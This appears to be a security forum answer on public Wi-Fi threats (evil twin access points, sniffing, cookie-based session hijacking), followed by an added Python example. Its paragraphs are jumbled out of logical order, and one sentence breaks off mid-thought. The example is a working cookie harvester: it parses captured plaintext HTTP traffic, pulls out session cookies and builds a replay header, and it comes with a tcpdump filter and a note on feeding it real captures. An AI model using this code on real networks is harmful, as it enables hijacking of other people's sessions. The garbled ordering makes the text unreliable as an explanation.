When the affected devices attempt to reconnect, they will instead connect to the "Evil Twin" access point (so long as it is broadcasting a stronger radio signal).
An attacker can then perform a person-in-the-middle attack on affected devices, allowing for e.g.
In an ideal world, WPA2 using CCMP would be in use in all places.
(There is also a whole world of room to talk about WPA2-Personal versus WPA2-Enterprise, but that is another question.) For the purposes of this answer, we'll assume that no password is present, and so the network is entirely unencrypted.
A free program like tcpdump can be used to capture all of the data sent over the wireless connection, including traffic both to and from your computer. Unfortunately, if HTTPS is not used (or a man-in-the-middle attack is used to set up a false HTTPS connection, see next paragraph), these cookies are sent in plaintext and broadcast to the entire wireless network. Thus, anyone who is listening for it can catch that cookie and piggyback on your session.

Firstly, an attacker can only trivially perform the following techniques if the public Wi-Fi is totally unencrypted (which is to say, does not require a password) or is implementing the weak WEP privacy protocol. To ensure greater security, wireless networks can use the WPA or WPA2 certifications.
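To make the cookie-sniffing point above concrete, here is an added example (my own illustration, not code from the answer above or from tcpdump). It feeds a constructed capture of three TCP segments, standing in for what tcpdump would record on an open Wi-Fi network after TCP reassembly, through a small parser that pulls the Cookie header out of any plaintext HTTP request and builds the header an attacker would replay to ride that session. The hosts, addresses and cookie values are fabricated; the TLS segment is there to show that an HTTPS request yields nothing, since the attacker only sees opaque record bytes.

```python
"""Added example: what a passive listener on an open Wi-Fi network recovers
from plaintext HTTP versus HTTPS.  The capture is constructed in-line (no real
traffic); in practice the payloads would come from `tcpdump -w` plus TCP
stream reassembly.  Hosts, addresses and cookie values are made up."""
from dataclasses import dataclass, field

# BPF filter that selects TCP segments whose payload starts with "GET "
# (0x47455420), i.e. plaintext HTTP requests.  Example invocation:
#   tcpdump -i wlan0 -A 'tcp port 80 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420)'
HTTP_GET_FILTER = "tcp port 80 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420)"


@dataclass
class Segment:
    """One reassembled TCP payload as a sniffer would see it."""
    src: str
    dst: str
    dport: int
    payload: bytes


@dataclass
class Session:
    """A client's cookies for one host, harvested from a plaintext request."""
    client: str
    host: str
    cookies: dict = field(default_factory=dict)


def parse_cookie_header(value: str) -> dict:
    """Split 'a=1; b=2' into {'a': '1', 'b': '2'}; a bare name gets ''."""
    out = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, val = part.partition("=")
        out[name.strip()] = val.strip()
    return out


def extract_session(seg: Segment):
    """Return a Session if the segment is a plaintext HTTP request carrying a
    Cookie header, otherwise None.  Port 443 traffic is TLS: opaque to us."""
    if seg.dport != 80:
        return None
    head, _, _ = seg.payload.partition(b"\r\n\r\n")
    try:
        lines = head.decode("ascii").split("\r\n")
    except UnicodeDecodeError:
        return None  # binary payload, not an HTTP header block
    if not lines or not lines[0].endswith(("HTTP/1.0", "HTTP/1.1")):
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, val = line.partition(":")
        if sep:
            headers[name.strip().lower()] = val.strip()
    if "cookie" not in headers:
        return None
    return Session(seg.src, headers.get("host", "?"),
                   parse_cookie_header(headers["cookie"]))


def harvest(segments):
    """Run every captured segment through extract_session, keep the hits."""
    return [s for s in (extract_session(x) for x in segments) if s is not None]


def replay_header(session: Session) -> str:
    """The Cookie header an attacker would send to piggyback on the session."""
    return "Cookie: " + "; ".join(f"{k}={v}" for k, v in session.cookies.items())


# Constructed capture: one plaintext request with a session cookie, one TLS
# ClientHello fragment (HTTPS, nothing readable), one request without cookies.
CAPTURE = [
    Segment("192.168.0.23", "203.0.113.10", 80,
            b"GET /inbox HTTP/1.1\r\nHost: mail.example.com\r\n"
            b"Cookie: sessionid=8f3a9c1e; theme=dark\r\n\r\n"),
    Segment("192.168.0.23", "203.0.113.11", 443,
            b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03" + b"\x00" * 32),
    Segment("192.168.0.42", "203.0.113.12", 80,
            b"GET /index.html HTTP/1.1\r\nHost: www.example.org\r\n\r\n"),
]

if __name__ == "__main__":
    for s in harvest(CAPTURE):
        print(f"{s.client} -> {s.host}: {replay_header(s)}")
```

Only the first segment produces anything: the HTTPS request on port 443 is just TLS record bytes to the listener, which is the whole reason the answer keeps stressing HTTPS. On a real network you would replace CAPTURE with payloads reassembled from a tcpdump file; the BPF filter in HTTP_GET_FILTER narrows the capture to the plaintext requests that matter.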